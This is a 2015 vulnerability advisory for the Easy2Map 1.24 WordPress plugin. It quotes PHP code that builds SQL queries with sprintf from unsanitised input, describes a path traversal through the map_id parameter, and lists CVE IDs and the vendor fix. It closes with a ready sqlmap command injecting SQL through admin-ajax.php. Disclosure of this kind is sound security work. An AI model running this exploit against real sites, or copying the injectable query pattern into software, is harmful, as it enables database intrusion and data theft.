WordPress Plugin Easy2Map 1.24 - SQL Injection

Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or
properly parameterize the query to the database.

90         $wpdb->query(sprintf("UPDATE $mapsTable
91         SET PolyLines = '%s'
92         WHERE ID = '%s';", $PolyLines, $mapID));

.
.
.
163             $wpdb->query(sprintf("
164                 UPDATE $mapsTable
165                 SET TemplateID = '%s',
166                     MapName = '%s',
167                     Settings = '%s',
168                     LastInvoked = CURRENT_TIMESTAMP,
169                     CSSValues = '%s',
170                     CSSValuesList = '%s',
171                     CSSValuesHeading = '%s',
172                     MapHTML = '%s',
173                     IsActive = 1,
174                     ThemeID = '%s'
175                 WHERE ID = %s;",
176                     $Items['mapTemplateName'],
177                     $Items['mapName'],
178                     urldecode($Items['mapSettingsXML']),
179                     urldecode($Items["mapCSSXML"]),
180                     urldecode($Items["listCSSXML"]),
181                     urldecode($Items["headingCSSXML"]),
182                     urldecode($Items["mapHTML"]),
183                     $Items['mapThemeName'],
184                     $mapID));
185         } else {
186 
187             //this is a map insert
188             if (!$wpdb->query(sprintf("
189             INSERT INTO $mapsTable(
190                 TemplateID,
191                 MapName,
192                 DefaultPinImage,
193                 Settings,
194                 LastInvoked,
195                 PolyLines,
196                 CSSValues,
197                 CSSValuesList,
198                 CSSValuesHeading,
199                 MapHTML,
200                 IsActive,
201                 ThemeID
202             ) VALUES ('%s', '%s', '%s', '%s', 
203                     CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204                     $Items['mapTemplateName'],
205                     $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) .     "images/map_pins/pins/111.png",
206                     urldecode($Items['mapSettingsXML']), '',
207                     urldecode($Items["mapCSSXML"]),
208                     urldecode($Items["listCSSXML"]),
209                     urldecode($Items["headingCSSXML"]),
210                     urldecode($Items["mapHTML"]),
211                     $Items['mapThemeName']))) 
.
.
267         $wpdb->query(sprintf("
268             UPDATE $mapsTable
269             SET MapName = '%s',
270             LastInvoked = CURRENT_TIMESTAMP,
271             IsActive = 1
272             WHERE ID = %s;", $mapName, $mapID));

In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory:

4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12 
13     if (!file_exists($imagesDirectory)) {
14         mkdir($imagesDirectory);
15     }

CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:

Exploit Code:

  • $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3